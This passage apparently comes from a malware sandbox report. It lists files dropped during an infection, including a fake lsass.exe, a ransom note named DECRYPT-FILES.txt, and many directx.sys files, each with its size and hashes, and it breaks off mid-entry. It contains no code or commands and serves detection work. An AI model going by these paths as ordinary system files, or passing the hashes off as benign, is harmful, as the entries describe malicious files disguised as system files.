SHA512
559099480bc8518f740249b096c123bc5dfb9dc0126d1c681f4e650329cfb4383754ec8a307057f24b2692c36f4fa8e90b5b5d2debe1061e1ece27a7b26335b4

Download Submit
C:\Users\Admin\AppData\Roaming\configurationValue\olehpsp.exe

Filesize
310KB

MD5
afbc408680d16aa491e10c002dc9c3d0

SHA1
272e07bc68d862f65fc2006d9d714ad03cb09086

SHA256
7b32e5045377a79d4f7f552d9971022f6883799eebeffa8f48f3c76e66acb80d

SHA512
05601f82bc44aaca332b7357b745a5658199c6bb86d26cbf9a110686351717359a6b64f1c713e278a3517b470cf7bc6db48c647f587999931606a137d0040fbb

Download Submit
C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe

Filesize
304KB

MD5
cc90e3326d7b20a33f8037b9aab238e4

SHA1
236d173a6ac462d85de4e866439634db3b9eeba3

SHA256
bd73ee49a23901f9fb235f8a5b29adc72cc637ad4b62a9760c306900cb1678b7

SHA512
b5d197a05a267bf66509b6d976924cd6f5963532a9f9f22d1763701d4fba3dfa971e0058388249409884bc29216fb33a51846562a5650f81d99ce14554861521

Download Submit
C:\Users\Admin\Desktop\1.exe

Filesize
89KB

MD5
69a5fc20b7864e6cf84d0383779877a5

SHA1
6c31649e2dc18a9432b19e52ce7bf2014959be88

SHA256
4fe08cc381f8f4ea6e3d8e34fddf094193ccbbcc1cae7217f0233893b9c566a2

SHA512
f19f3221a26bdab7ddcf18196ef6e6012968c675065c4e56f54faaace18321c07771fdbdacabd365159ccc5bf01e40693146709217e13dcd282609242e61a4bc

Download Submit
C:\Users\Admin\Desktop\2.doc

Filesize
803KB

MD5
7f6c623196d7e76c205b4fb898ad9be6

SHA1
408bb5b4e8ac34ce3b70ba54e00e9858ced885c0

SHA256
3a5648f7de99c4f87331c36983fc8adcd667743569a19c8dafdd5e8a33de154d

SHA512
8a57b3c14fe3f6c7ea014f867924176d3b9c07ad6195b0e5fa877e16b55b1c23e4abfdf24b7e7a0dffafe8991d4878d98dad1419be03f27f64f0c95720542dee

Download Submit
C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\@[email protected]

Filesize
944B

MD5
0a4d7c2b1a97982cac25f281e462ce15

SHA1
fb3cde435fb4c148c0cd3d55a84e26a28d8f3d6d

SHA256
4d783a6343debd940fa6b5f4a51cd91415b6beb6221857579e2acef512d9a29f

SHA512
912df852cd9047986c8f5ae1bed392684b2725db027b26ef41628193897c76f665a162a6c0d70a2b52c9d5fb92455246fa8cc39fb991bf507807abeb73681d9a

Download Submit
C:\Users\Admin\Downloads\@[email protected]

Filesize
280KB

MD5
70aeca0900d87e44b1df8ee2b483c13a

SHA1
259905763629d129cc86be371dd09462f8900333

SHA256
a12d6a8c09b0a451a6c334f1f7a7dcd91bb49283f0edabd774033b83658817f2

SHA512
371f2b3d0a679508f5963f12c17d13ed6a70ec79d5aba7a5af31bbaae63a4bde0ce2878cb3acac706a1df1b4885b6ee3159601555a8d7f4d55d4ff54fe0f36cb

Download Submit
C:\Users\Admin\Pictures\6bzuMgRU9zpItqkZleWthPIY.exe

Filesize
7KB

MD5
5b423612b36cde7f2745455c5dd82577

SHA1
0187c7c80743b44e9e0c193e993294e3b969cc3d

SHA256
e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09

SHA512
c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c

Download Submit
C:\Users\Admin\Pictures\G3Woff21inLK5Nfa62Nf905a.exe

Filesize
5.1MB

MD5
31fe8282952877e77efb5ff166344763

SHA1
5267cf87f61520b448b550cd2d68bdfc10154a7b

SHA256
2481d3cd7174257b69f02d8808165c0e2438deb38ede99df332eb9d4fff3593e

SHA512
784fc76b1d619818e94df14306e0c6711e8f6ed999149f7b43f92b1e5dcc665f85de3d877490cb806411469df9e28c6cc8dbbec9817f9138bc306e9e9584cb48

Download Submit
C:\Users\Admin\Pictures\Saved Pictures\DECRYPT-FILES.txt

Filesize
10KB

MD5
4922e2693310a2d40a9ca4c6e11ac94a

SHA1
5bd10367f9b4bf300171a7237e443da81631f5b4

SHA256
70959f0bdf5f24f479815ef90e4b6642a6235949c1ed2c305ad268636f1526fb

SHA512
df929a0d8683114f6b94ecf274d4186c001f180cdea0013bac33424a9d06c5a4f678302aa10acba730ef674ae65e70d350ea9e72a673f8e9c34b9b630c2bba47

Download Submit
C:\Users\Admin\Pictures\SjgYa7FXqd1a0xBFMcTB1xdo.exe

Filesize
5.1MB

MD5
d69b58edbb4a16964444ec3152a6f493

SHA1
6ecbfe9b3f6a3325298efb0e782a2590c89906db

SHA256
4413755f01f5d1eb56d785ea59f3f0ca975807f727e06cafa4fb383faeea8619

SHA512
d162d523408fd8c3b065cd840b820576094f921ab9087969bde798bda999123f00e37b4772d88ca600d167fd93284b4233838932afbb9e909f6dee918db8c29e

Download Submit
C:\Users\Admin\Pictures\TCtWWxpOvEx5fksBQuc7iBaR.exe

Filesize
8.2MB

MD5
00da75dcaf40771e058c3d3a406548a8

SHA1
7f24771708303c3863ebc1c5e0bf5839810fd375

SHA256
3d02f56b472bf47c75147dc648914e09bdac79f7669e64cb70dafd32315abfca

SHA512
bf3331590e7832e4adb908b3a6e7f8d9658233b4a2c66aba5952818f799fd4e409bf1fb1202e798e72ce6787898b5ec8cc982318fecd20e451ad0efc9923f7d7

Download Submit
C:\Users\Admin\Pictures\ePAcuGPiAltMWt0jJ4UwOHc9.exe

Filesize
4.2MB

MD5
58ca45df3902ea326529b1da0c7979ac

SHA1
029e1bd3ed13423b77757fdaa879e464c2ea30f2

SHA256
2fad3777545193bd7088fdd98775742748ea604db6c8a0b42a3e1580cf610646

SHA512
46329cf579f078b6905008d8a0b80a6bafddb1405a45ccac0f009b8548520e862f724c0ec7e7a55791384efb86ed0e9936be9a5f694840e08f636152a2e071fb

Download Submit
C:\Users\Admin\Pictures\gzUQwq9beGB8spziZO9iiRuh.exe

Filesize
4.2MB

MD5
c0db4d08845a1507f0861e6568d71353

SHA1
4b9f54cd27f82b6964a099c8e102f126288058d5

SHA256
ecc0ce580254b77caa98979b2c55b7fe880d00225e84a02f9b6c72730e78d018

SHA512
235705389554352ced3f098e5e5edf3bc1ad77d851ac9eea9afd138c0ce80fd2572a988576282a9c0bdc1dba0201d90bbf00d05130bc0ce7e0af15c85cf4acd4

Download Submit
C:\Users\Admin\Pictures\sNhMZzsvf2W3Gjd8AXjPTWUh.exe

Filesize
6.4MB

MD5
901a267075d2241e2ba3c61c62ea808f

SHA1
dda94bd5eabed5b10f59199b0850da263de675a6

SHA256
889a5cfd4e81bc7ae1752a6460d8ac7d54c0c1124d4f850c18e514a63c5dd884

SHA512
ad07afbc9572e475b06f733c8b6ae47031b875eb2167a849e2d71fe486b71d1c2d68b52b21d142b7066c4f9ed3e02cbaefe9795f0374fafbbda6a286fff1ed1d

Download Submit
C:\Users\Admin\tbtnds.dat

Filesize
4KB

MD5
00cf158125ecf677c364e3b5bf2e9def

SHA1
2484c864831618194138ff86a1bc0c07003ac9ca

SHA256
98b54334267e34d33a56fedfd8c84e2f71c070cedd3895c7d7f46b0134ce4de4

SHA512
2d772469d41c70b0f973645fd8f9de593dc4ec48e3e3c4320f4ab8c9f74c3f01d2a949e8a8cd49e5901035d55b0be9bec6b07965f26e54ff3950a5ca8bd7cf56

Download Submit
C:\Windows\System32\GroupPolicy\gpt.ini

Filesize
127B

MD5
8ef9853d1881c5fe4d681bfb31282a01

SHA1
a05609065520e4b4e553784c566430ad9736f19f

SHA256
9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2

SHA512
5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

Download Submit
C:\Windows\System32\imapi2fs\lsass.exe

Filesize
564KB

MD5
748a4bea8c0624a4c7a69f67263e0839

SHA1
6955b7d516df38992ac6bff9d0b0f5df150df859

SHA256
220d8f8ff82d413c81bd02dfa001e1c478e8fbea44bad24f21b3a5284e15632e

SHA512
5fcdfddce3cc2e636001ed08c5f2f7590aadaa37c091f7ba94e519d298e284362721f1859c6ffbf064ae23e05d4e0e9754b515396812fbe9f9028497396799fd

Download Submit
C:\Windows\Temp\gdaawrhfdlcr.sys

Filesize
14KB

MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
C:\Windows\directx.sys

Filesize
452B

MD5
c3a34e86f159c997f8794780a90a9acc

SHA1
96498226a21695414144ce53a611bd2478885f31

SHA256
5ed79f3320361781716ef528f395537d0f65f2f5e825c074ce004e11f5671379

SHA512
4039ee36811a6e7c232b6ce3ede7af5e15c4fa0b2130e71b102236126f75b59417ecbb5ba4ebc8c7025d4df10dc1d9b16518b1e927ff095232df69d130b2fdf5

Download Submit
C:\Windows\directx.sys

Filesize
451B

MD5
2585b8aa04230e159f458586d2a25ec4

SHA1
54eec15b9d8c47a8ce74a0d50dd7eeda32a4e9b6

SHA256
b8463fe3b57ade681059c11848fca893dc5835fa8ee076052cca3c6f0dea8737

SHA512
3004e2b76bf4139a148f837286d6769772bdbcabb63519a9f4583dd36c4fc9913e9f95f84e81edca43810e636c7f78342db45bccda586b92e4148edd77d692d4

Download Submit
C:\Windows\directx.sys

Filesize
454B

MD5
874c48a800b79c91591a975e3735e6f0

SHA1
6e484f444cb000f1ebdb8b4f21ad6fa97fc1ee11

SHA256
bc7b959bcb3bfbfdaffffa492da3deaebbea3dd081d828329c9ff77ab8cf67fa

SHA512
c281bac04ec2b7894af6e634aa142f34470a84bcd6710629774e4587092b6e38d5020bb5e8a6048ad6bdd879b849fec41477ea55e5367953dee2c4fcf47a3327

Download Submit
C:\Windows\directx.sys

Filesize
76B

MD5
033a21d049cf5546fe0537f15435c440

SHA1
2da12b487030fb6300e992b474860444229dfad6

SHA256
bdb8157f9c7d593b90df878e8010f87c3d3f18108e43d2e50415b36c5536f3d1

SHA512
0a60df9963d3b5adb25347d1270163d7257dd0823a4435a7a07a3a0dfdeeef6e9b06d1101f672453b5cdc63bdbc18d4fd43e813fc6220a5c764a276190bcc224

Download Submit
C:\Windows\directx.sys

Filesize
454B

MD5
eba950a87df3d1988f1401eaa6494fdd

SHA1
a54360391e286fd2be47c4c7fd0c5e23854c5c1e

SHA256
09889c6eaa6737297ad5d0f3954bfb9f58d50666063cd8094e79ab6d193fae9e

SHA512
a4568786ef1ed900034d937c5815f1422104b6838ac04fbe4bf038e68ed7a441241dafc7cf778e2f794076757d486b08836bb98e0b7ae9cf6fcfa367ba29383c

Download Submit
C:\Windows\directx.sys

Filesize
90B

MD5
0669a76a3621cb440a5a1ec837d3d8e3

SHA1
91514f24f037cca8882fc1b533519eab2186ce55

SHA256
b29b70a22b7a66d66b20034c6104540962decf6556510d6eccd72062d1b83a03

SHA512
fb6523ce2faa50431740c06ffe3eb9d376cff56bc59d35f7133562063ecd50f6ed49ecb8bc4fd131e6faa2a22239bae01612cc65b789c7722e1eecb53804c92b

Download Submit
C:\Windows\directx.sys

Filesize
430B

MD5
48f8a62e2f77d0b23bd773b1440a0e69

SHA1
31808552b9501759b07b5a624c563c9c8681f928

SHA256
a936631b8c7f847c09de5bbfbeddbfc390d60cd89490a1b332821bc5bee2dc7e

SHA512
164e229f639237d841ef63a254d33de732a8054d11a3f5628b9bc9af0009dbd2e17f74ac82b73c79de3f174a36a7cf64917b8395b536185970e6e62ab1c2e7c1

Download Submit
C:\Windows\directx.sys

Filesize
454B

MD5
5d6fb3c8201366c5a944380ac93a6318

SHA1
27bfb647641f0297208be7f6d83d0d73e5689000

SHA256
0e08d2511ff948893e28a8e4f76814dc887ad0b8d417a3bab981e38e711b9f8b

SHA512
9c9d53bf7971ada45ddcb74e3b02b1f5bc477300056f4571dad53f1de428d63a69721780681d3e9131ec7a34421c256aa38534d13a2d5792359b591022c85725

Download Submit
C:\Windows\directx.sys

Filesize
453B

MD5
ff79728ef6f533f363104b40f04bed26

SHA1
8190e781cfdde2e5ff8b1cb9fe1dd731437a32da

SHA256
3f3d4e732d4429280d5c14c50bf3d75afae8318e41c9bf5c067e3b32797aaf49

SHA512
4f9fe0a6c1515e6301458ad4ffe39bd65ae0b6ef254396f03af63644fcf25b57900d42ba00cc6d0c752ae6cccb5a106585d7e67835365953f768b720bba7cf5e

Download Submit
C:\Windows\directx.sys

Filesize
56B

MD5
649a1ce955fdb034a5ac0c9ee98557b6

SHA1
5ec2dcf3bb17bc912d723c9f883b6aa4bd664054

SHA256
f48412ec3cb537769d02b4fbc617fdc217f96ac6c1ec6aa6c3d4ffc9d6dab208

SHA512
97e0c96f25120cc253af27d569adc5b80d440e8a0368e7de9b75890bbf59cb39b849395f42e246bb42f277ccf623258c53bff543051d862075f0b9c58b9c8f32

Download Submit
C:\Windows\directx.sys

Filesize
61B

MD5
aea79e4e88434f4dacc1a784a1b07f80

SHA1
453627f2893ad38e6f4d76bbdc3158d252f55a9e

SHA256
af169b2e15884354e85c3729951f8688877efd8b5951727fa69edc8f05a030c1

SHA512
6b8b174b8a665ad6c9782194c73b054b882b1a7d59495ab088e4ff492721b28aa71957fe75b1edb4a7fa4f8dc04dee086e9de2a3d73aa3b9061fe2fa70a234b2

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
d8af0952bb349e127e82cfe1cc35473d

SHA1
45899af6eee06f4f67403d6ebce9b17d62c953dd

SHA256
0950b757238d83b6c1e67dbb48b71e9a1d3ed289c45b5aebbd053f3ddf7927d7

SHA512
15c2aa781cfd2bcf34f754fa6b868a23f4b5a0d29e22e60412db7aead41a9570a13b6aabb1127a4a0347c23b724e99b4329c75ee6ecb80d0cb5b1f241890536a

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
af723072a7ed434f38dca0c24ac2ac1a

SHA1
faca1dc1cf7e0ed50ce61b71cbdf55d6428f2d02

SHA256
5a9f712a5cfc609fd81c07864789a4b43f5cc11be155d04a6e6d8a6a63a6b3e1

SHA512
3131646c99855c29e5186b7c2e7c3600a3be807383edef8a9b87c40394aa025d43ecb13e3e1fa1e6619d87e670291414802d40bc7f5d5cfb63d4cd3150c4c6bf

Download Submit
C:\Windows\directx.sys

Filesize
58B

MD5
f7198ea3623b564beedf9a162702c1de

SHA1
e6cf932731af60388119eb1d5c45642080084c41

SHA256
8f44af1adcd140c056fc886f8ba214c38902d50a4597340df60bb64c92f72faf

SHA512
50fbfed46d22e14b55312aea8639e81a40be5ae09c8f3cadbf089433eff979f376e21e75a366a592409c0ad52719eda48b745434d10547e340093435d07be9b3

Download Submit
C:\Windows\directx.sys

Filesize
61B

MD5
9319379992350d1979b1b8f0f73a4832

SHA1
9580a1eca59c2b4eb96c9c2ba38fa1e1542f4703

SHA256
95341e2cb161a33abfaccb8811086d20fde2d451a59f6949f891506d0ee5f431

SHA512
8fd10d7f093807af0441ca5934ce0c8808b02c006e6cd7fb2c4e62e07e6a3bf7d0632243e4ace8548a02d1aba95bd3dd2784b099328cd61703858e834a5f5a2f

Download Submit
C:\Windows\directx.sys

Filesize
60B

MD5
aeed688dbf377479eed916b88456ccd6

SHA1
511551b15eb729f2dfc3880dfdc9aedbd99f728c

SHA256
3b17f0e2dcdd4101273da878cb26d928c19b9cc00796aaa027c5e0e682b3b183

SHA512
2d3435d6faf0fd0d2bca4a5c7b15a93791b5345823231c050bccf43ffc3b8b6da9aa0953dbf584cc5cf69737436bcff4b7a5e734c41be3d11be152376b683fdc

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
5257ba362f54592050d2656ec624917a

SHA1
3172069db9b23f759dcac6506c41d85201723bfb

SHA256
bb9994657be4ac69de9a651b6b5926482f5a389748408de070fa958397475bc5

SHA512
ac147e26e0abe91a0ada836f87a11f96107f4070ed9af98af9515043eb3d7b43152515798e7fc41932732f37f7fb2686b475f5068075316e4557bfea2544737f

Download Submit
C:\Windows\directx.sys

Filesize
56B

MD5
2e9d0bb9ed9a6174ca8a0bb85e04e6d7

SHA1
e89fbd37daff1decb5b547cc17167eaf749b856a

SHA256
6233319c90a0f17e04c0513529068f55fda319df816b00f7213658189fd87f68

SHA512
c338d4a7f0ba214ef7320c1c2485030158e7fe5ac5f0ea5f7870b6c5164023b387014ae223c69bb765690e3a67cccac62dd66378ca03123189f63983e7674a66

Download Submit
C:\Windows\directx.sys

Filesize
47B

MD5
af79ecaefb5739431a904b952a015f0a

SHA1
e311bf45903d5366bc64a75dec7e50f262e0e920

SHA256
3fe7359c234f754ed7bf783d778baa7c5b88d8c06d38519b5ed4567c47d02134

SHA512
9e6d1e4539cc611fddf13942b0fcf05508116f856ebd4c9c042ec90de45a3a9744f67586907ff973a4b7439b9ada374fd99f090e5c100e2a3de82c7e56ec35b8

Download Submit
C:\Windows\directx.sys

Filesize
90B

MD5
59c9e2a41f560931ec584bc78d3f2d8d

SHA1
ad2a1b1c986e14a642a2e5660fe3be6948a24e52

SHA256
e929029d1f12e4fe30a18f1378d98140d3e2a72913d62daf70d4579b76c58ee6

SHA512
b9e555ef225ddbf5be4fafb9bb31e9b8c8219565afa25ca7ee12f76c006f2be8f959d7bc8ed043d0224d7c2c4cb2fe2877263d924fc9a96340ca00219b59d80d

Download Submit
C:\Windows\directx.sys

Filesize
118B

MD5
a980473d6c1a5fa0d1e8dc73f1112df9

SHA1
02d6cecdfc12c00bb8830bab435bf724d5c672a4

SHA256
aa68414217399d8f967a806504d58dd062ee0bd90dfd1792ce64bc62250eb029

SHA512
f7d31ad646d5e04bc1832d56b064960a6a00fa8f75a71a3c841ee7b2f468a04c52a8ec6d681edd313785e1e8967427492ee9b2d7e083e922145659ba47b98194

Download Submit
C:\Windows\directx.sys

Filesize
108B

MD5
9949a7e175187b9aa99d0699456e48be

SHA1
230d74269d83637b5c3568410a569cdbbda98fc1

SHA256
be37779ace353c57d8e56512252773fd74558cdf2186acac89bebf8d86c36cb9

SHA512
ca97b75e2bbe97e1377e0452c3cd79af0705db889c89675800ee87239d7472c4ee1283881c893bc3ae6cad1c4471a1d3c73620a2dabbdc2e7ce15b60a3aa8d3f

Download Submit
C:\Windows\directx.sys

Filesize
90B

MD5
15bf8cf214a300c0ee9392839d99e5f6

SHA1
b4fa82bb90cc96ad2033671e2f81b54d09ae7d84

SHA256
1ac2309d1b5fa86d640f177cc7018e66370d306f18bf9c75f96faabca9c11538

SHA512
fc5c31e436cdc3e0512000cc561d5ea7bc3f9d9ae9b6a29636520324567cf91007e4ce345e164bd1ec6cafae4ef99df41451f88e5f398e882ae6a0ad245d2157

Download Submit
C:\Windows\directx.sys

Filesize
164B

MD5
df5823c3e201b7e7bceb3e1d0c2de5b8

SHA1
0c752f81f24758e367fde6653f2b8ea43fcda61b

SHA256
c02d673be051238732ffce163e366c9af6ccd4b222cc51c368040ecd2a068b63

SHA512
7193fb826e06d958423a7040695b083e08f0a1ded34879b35d64ab12871b50b2b972a90965ec2ce392d9c5818d6a789db95b399886da2a9a5464eeeaae1a3a7d

Download Submit
C:\Windows\directx.sys

Filesize
223B

MD5
ef440fbfea02360251d0b824f2eef579

SHA1
1a36b0e33877dd6074538f5115424af217732917

SHA256
4eb849e7b9d29d09b189d6fb5319c659933a5bc1e62295b8583afec75749f5e0

SHA512
c8812c2c094ef3db8704baaec917f0d4e2cc9fbeca1e1e94a77cec0deb566ed0f29fa75383738aeefe70c202caa3b7e637df38a4949538b052d8d65006e5e62f

Download Submit
C:\Windows\directx.sys

Filesize
206B

MD5
5216839424c7259647bcc5c0baf37368

SHA1
5767cef752ab7627147b0772fd5d35881f54045a

SHA256
7670e7737caee358b06c12a6870fcecdc2fb8e299a51c82a70022e1905018932

SHA512
b24b12d2433f85c916fbf1e4a365fc4a1660e4ad64c55ae9d3899537cbeabed10f6176b8bd004c4997c3d5ea33685d8487243c61bcf00ffd2222dfb3ac46fae1

Download Submit
C:\Windows\directx.sys

Filesize
251B

MD5
c52ebe7962d9bac2d84679ce9831638a

SHA1
6dd5740a8bf96ec03b1668d499ee5b80f51113ca

SHA256
797156d2cb087ae9117ef8603cbd43232d6a370510254480ed20c3e898de8adf

SHA512
017ecc7a888c14b0972016f176d9ec6bd498adf27e43f2ae0aefc830fb11689c566b282d8bc1331fd792e4700391534a0af9bdca6303387b754770469d2a670e

Download Submit
C:\Windows\directx.sys

Filesize
313B

MD5
165d9cc326be4cc2f0c9e40701bb7f28

SHA1
8bc8da4fb6441cac524c74ee2bc3d3588a49c23e

SHA256
90485e6ac7d3f02e008705e1d456b808479279d391213beda5817d789645dbe3

SHA512
ff0132ca7d853cc33499c9dce4266f370a2cd534ea3a4c9b7d52e7afb1271d0e41f968bbde1246d40346463307b12de318da3f862bed141d9d92c5118e73a066

Download Submit
C:\Windows\directx.sys

Filesize
310B

MD5
2f2b80c175fc3b8f4071aedebf745764

SHA1
4afce814fe15ad152034d01f9709f8607b1c7eb0

SHA256
0b7d8c64960ca13cdfe3cccbe52a0cea9e1a88ba5f209ab6714d2defbb6acf41

SHA512
d7e63322e1a9ed2a1e2c108ce1301bed1b0492a99e29eb9425743c6e34069816f95e296a6a8de65e1e5f11919245b75d81ee534d03ae78bf222ecc0c3814dc59

Download Submit
C:\Windows\directx.sys

Filesize
309B

MD5
19ed3038dbaa59c192a026b0d73cef24

SHA1
ac0a97793d1b371a6ae3f744a62870bf95b2f12a

SHA256
901b402fcffad2d6c1751938c6a342bacb45adefa701dc625e2bdef2facbc8bb

SHA512
d7dbb7dd0b2e30c31c568170a8bfdbe15c950c5cdc72319dc91bbdff2c6bcc5b2a55f9e58eeabdf3b715cf2dbe06a9f997b09534182ba962ea2a96c51f2f1265

Download Submit
C:\Windows\directx.sys

Filesize
313B

MD5
5cd41f5c6897d6a3bdfe2b6e1b7ee5d4

SHA1
5442b77d542889df6efa709fbe4a078048750e0b

SHA256
1f94e9a1f30bcdbc04463475495f9752d0a504abf10e170ca94ea14e9fe8cbb5

SHA512
86c74820bbb3bfed7e535df2559fed23d7bc00d9d601f930046e604b4e8b5471f6999d426caf25bc36dd6acd38ad5bf3f3e8a144847d55c466cf4dc889532777

Download Submit
C:\Windows\directx.sys

Filesize
313B

MD5
69915005799985fb2d59585b708fd9ad

SHA1
1f487d129d93ca65e8f6005b1090482371115428

SHA256
78c4afe5f4831db1b7bf2d5d8da7b5850cfa5914eedb6252bea6da6fe08421d1

SHA512
e64fa7a754eed4cc255c5da818effd4d6b56e56e01509a36ebbc38b7d6eed9e87511c9f816b1f244364590d7ac513306e357ff29da38b2be73801435155f55ab

Download Submit
C:\Windows\directx.sys

Filesize
313B

MD5
011d9446005ad31ec88d7aa33e378377

SHA1
d593579a69cd835e4ee05310d890afb9e9dc1f10

SHA256
cf038eec86cbec9045db43e2fc1589ef44cf213528fe5ece56afb5232b6ce95d

SHA512
2e4c7d156d624ad0ece3fa84f0cb7fecad83200868eaa07f56814e958fc120c19aed4eb9d386d202c9f07d85ee1b53ffba310420a33ed153e2ff297c938e1c06

Download Submit
C:\Windows\directx.sys

Filesize
309B

MD5
3f6aa5fb7de0bf674197669c4344e013

SHA1
0596a3e0b7bbe34569aee65da2ede10d3b4ace08

SHA256
b25fbfd99f505eacdd8024523b47d359c8582aea8eadde85345a1e28dc00326e

SHA512
a24d6eb15ea0af8ae2b8f0e89af7695fc325ef446b18996226b9ee0b96e6387117af48ca92316e46745c5f1f3a17186ccac3962d6b4bb9b11d8bcf52246cfb94

Download Submit
C:\Windows\directx.sys

Filesize
311B

MD5
0ec8e21381ea1a1b32c62bf33c9f5fbf

SHA1
6aae2e96c07ba23be16dbf58e12f31d20b7b942b

SHA256
a1c05e0ef11983e358159eac456e0eb5a2276d38438ffa2a4c2fc66506fa34fa

SHA512
1a74514f061598d52b74d59696bb89f3d0c39ccafb738cddf581e839da2b4edf7a65a8380c4f2c267795482535cd26b58c07bb64afff76e1356d351f8b92b7c4

Download Submit
C:\Windows\directx.sys

Filesize
308B

MD5
3862ba002a354721fd367acfab5692fe

SHA1
37fb8a09899339cc6714db7e9e21576f257e4965

SHA256
c7537e7885f9ee9b112a88b697b8fde6711613b89c66b72ce65584e47a3197ca

SHA512
69b1bfa42af3a797256e54410718bb9f9f5ae10858fe4c56bbd426811157b9ed960c23494fea39e1c1c44e0806fdcf3f6dd8cf87d043228bda2a8608a854b0b6

Download Submit
C:\Windows\directx.sys

Filesize
305B

MD5
9aec6d73ef1f1a4a047bb0c87bf5f775

SHA1
60a78e664b89127ff54ea8e7d61f530451ae7808

SHA256
30667bc2963f8c0d57aefec0dfcbd30c37e5602e5c7bcba6d289abd3719fe49c

SHA512
cc618c2f78e8477d1cd6ce05f02564a2391ff8dcf3d9b0f4b52bced0e12ff094f0c2c0b16a1c5f7835bf7e8eb7b2503b499983ec43f34b13d1152b2beb1ad74e

Download Submit
C:\Windows\directx.sys

Filesize
308B

MD5
935f28d29a4c64975609be548c3a4b0f

SHA1
519e849eb1590015d5c4cb06e7a614f9ee01f5e5

SHA256
9058be0cdf1ef413594466a3278ffb88c7d531fc40c0a9502c4547481f5e3fd9

SHA512
eab97bab1d2f367be76b481f1f4dc5b190e2712a59fc3985149eac565f12498f670bdfdf754fce29ecdf0d0300dc70e70c33ab89ae9cd35f3838deeba398ccac

Download Submit
C:\Windows\directx.sys

Filesize
285B

MD5
f27236551e56ea0852a4a9f1dc39f1d4

SHA1
c131850d452735fa25581b8c00a05c56c0557406

SHA256
033edf8a0c48a89596fe373e2290fa5c499cb5409aaef7d82365b85eb6ee1d35

SHA512
d29b3d113c32baaca4fa69256c7cd97ebb1c7a3a3c5f002bf41f24d186f4ceb5c5e0999d98c26ae9d422856fd92a36f490d4c84175575f6d2d007dc842da4d86

Download Submit
C:\Windows\directx.sys

Filesize
304B

MD5
9265f30c2da0726ebcd1ba26c5d41d30

SHA1
bba1ae1a3b734d4d46530baa05bc07ec7a4bf483

SHA256
2bb77976467457af355ddcf4be3bcc1dd072ce5c5c8386693d42ee7671050658

SHA512
dd6607f7743df76411942fe34c456b990a0f879f0356dd921df48bb4e72dbca7ca3c6bf5234c07bc3cb1dde19582eccef84afbf4008b80b8a2069fffddf5e4ee

Download Submit
C:\Windows\directx.sys

Filesize
307B

MD5
d2703a3e0a8210cbf8ae8bb2b615f72d

SHA1
e9f6c4c2a84706c49709d80a3dce1d965d24f7f9

SHA256
210e078f9dc674626075640ae0e6e728449aa77c5096da2cf3a88187b306a00e

SHA512
ed478b9ddf6cedb1b7bb8354a3043c92bf7a8ed0cc891e4a23830cf1598f498fcea9a5a6150643df246e2bad6f2258bdefc10ba84f01e5542cd20bc48b2d2a25

Download Submit
C:\Windows\directx.sys

Filesize
307B

MD5
9a82c1842e991256aa93855f94cb3d78

SHA1
a6573a56d2995acf5a3485e085a72d56c2286662

SHA256
2f6b61b7b4e44c2800d29b619f3fb702450c8f181d00c7d09ae20d8cde1766a1

SHA512
c632d39680273887802ac8a068589bd5244017a91139086aa5adcf56fd4c44869c009cb60afa71e4257312baa7370d2502f566c378788f2802a21593f27fbca3

Download Submit
C:\Windows\directx.sys

Filesize
390B

MD5
ec91d624ade69dc7449bbd8891e40e9a

SHA1
281f569a0ae8d662c325025a0d4d55663fa69d36

SHA256
b084aaac36fdc02d48bc8c19829ef56f8b64c1769848a0151ee885712a928ee1

SHA512
ed276616f5062373167d8a0996669b251403b02f5eff7b5f7dcbc95934f5ea47feca38fb020d39e74e4355c26ef964457c27e5abca4654b969c8aa546602a8bb

Download Submit
C:\Windows\directx.sys

Filesize
417B

MD5
63dacce511008ed9e4afdc5c0aeed9fe

SHA1
f57fd1bfa150ae9be1f0d25791ab2beb1eca070d

SHA256
3275bc73c01ea0db6718cd5dd4cb993c790e4108d405ae9cbd96213dc971ea5c

SHA512
2b734333ba50a98fbec1677f5ee7fb35add7073da46252c6745fcd2b836276a8ccbed7501d158ba12720cdc6d22d614f916da09bdbbc0077601aa86061885d18

Download Submit
C:\Windows\directx.sys

Filesize
417B

MD5
83376674bd7c958ec0513e8b7a4f56a9

SHA1
cba624b87a62222af68be336c9acf752af70f0af

SHA256
34109f91988d46f923b9503c27cd075a1188361e327288ff6e50e270ddc214a5

SHA512
3313556a6bcc3891fb8515b70525933363a2aedb97c54254e5de6aa58f5a9e633a2694f83e21c28d7678d449717150266fbb21604f1dfddda7cb6a20696130ba

Download Submit
C:\Windows\directx.sys

Filesize
411B

MD5
a6980d92bff30862bccd23094805f5a6

SHA1
ee478485d9c3c9e4bcae6aa4007a37d4b6c179ec

SHA256
f11c7a341ab0f7c31ad07e4a91f3e5e1c2e140322c1850e3985719284a7bd043

SHA512
f17b397cff443e390e0dc31f71b23cb6365b437521ec0e6553ad59f61287361257c9384929c611621cbc4dbe35fed83a2d0756e5bf57bce40082c17846f62d5e

Download Submit
C:\Windows\directx.sys

Filesize
415B

MD5
3c438506906dfe8ad0be50897dd7b53a

SHA1
9f5ae67b8a853f8bd7bbf98ed5cd7ecb67e050d8

SHA256
4a8beec4a8a5eb257dc4db3ad6578c5f6825e51798203e97cfadb2b42b01c739

SHA512
51478ded64d056344b2e677bf1fc8ca65a558a084d0a975e8c9783482c2fd15b3a7573e754a1431e05b8c835dd085c9a891817971576fa0af587a76da0bd0a14

Download Submit
C:\Windows\directx.sys

Filesize
408B

MD5
a02c24a6e56aaeaa295aa0c1bc71e23c

SHA1
c07d32df56ab4d92d84a3d82e572e2dafe0656ff
